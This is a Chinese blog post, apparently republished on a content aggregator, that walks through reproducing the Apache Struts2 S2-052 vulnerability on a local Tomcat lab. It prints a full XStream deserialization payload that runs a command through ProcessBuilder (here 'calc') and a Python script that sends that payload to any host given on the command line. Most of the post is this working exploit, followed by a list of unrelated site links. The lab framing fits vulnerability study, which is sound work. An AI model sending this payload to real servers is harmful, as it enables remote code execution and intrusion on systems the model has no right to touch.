S2-052的POC测试
来源:互联网 发布:大禹网络 编辑:程序博客网 时间:2024/05/16 18:13
今天朋友圈全被S2-052刷屏了。看了好些大牛分析,虽然原理不是特别明白。但是想尝试去复现一把。
一、环境搭建:
需要TOMCAT / JDK /struts-2.5.12安装包 / burpsuite
tomcat和jdk我就跳过了。
struts-2.5.12安装包的下载地址:http://archive.apache.org/dist/struts/2.5.12/struts-2.5.12-apps.zip
下载完成后解压,只要把app目录下的struts2-rest-showcase.war放到tomcat的webapp目录下就可以了。
二、POC测试
启动tomcat,浏览器访问 http://你的环境IP地址/struts2-rest-showcase
打开页面后,浏览器设置代理,开启burpsuite,并设置和浏览器代理的端口一致。
随便点击一个View,截包
http头加上:Content-Type: application/xml
以及我们的POC,这个POC我也是网上找来的,实在写不来。
<map><entry><jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>calc</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>
然后发送包。成功弹出计算器。
python的POC示例:
python 代码
import urllib2import syscookies = urllib2.HTTPCookieProcessor()opener = urllib2.build_opener(cookies)xml_request = '''<map><entry><jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>calc</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>'''test_url = "http://"+ sys.argv[1] + ":8080/struts2-rest-showcase/orders/3"print "test url is %s"%test_urltry: request = urllib2.Request( url = test_url, headers = {'Content-Type' : 'application/xml','charset':'UTF-8'}, data = xml_request) f=opener.open(request) print f.read()except urllib2.HTTPError,e: print "The test url is struts-52!!!"
阅读全文
0 0
- S2-052的POC测试
- struts2 s2-045漏洞利用poc
- S2 测试的错题及解析
- S2-029漏洞GET poc?? 悬赏 5 WB 20160320
- 统一测试S1-S2
- S2 测试错题
- 统一测试S2
- POC的含义
- POC的意思
- POC的含义
- MS12-032的POC
- PoC
- PoC
- POC
- POC
- POC
- S2第一次测试错题
- 筒体测试 S1-S2
- MySql_explain详解
- Linux iptables防火墙规则配置的两个坑
- 使用sendMail发送邮件
- Python时间序列LSTM预测系列教程(5)-单变量
- 针对IE9时间不兼容问题研究
- S2-052的POC测试
- 设置单文档窗体黑色背景色,并输出红色的文字
- 标准接口
- Sql性能优化之索引
- centOS环境安装python virtualenv
- java简单理解spring控制反转
- Video Acceleration Magnification
- 音视频图像质量分析评分
- 验证必做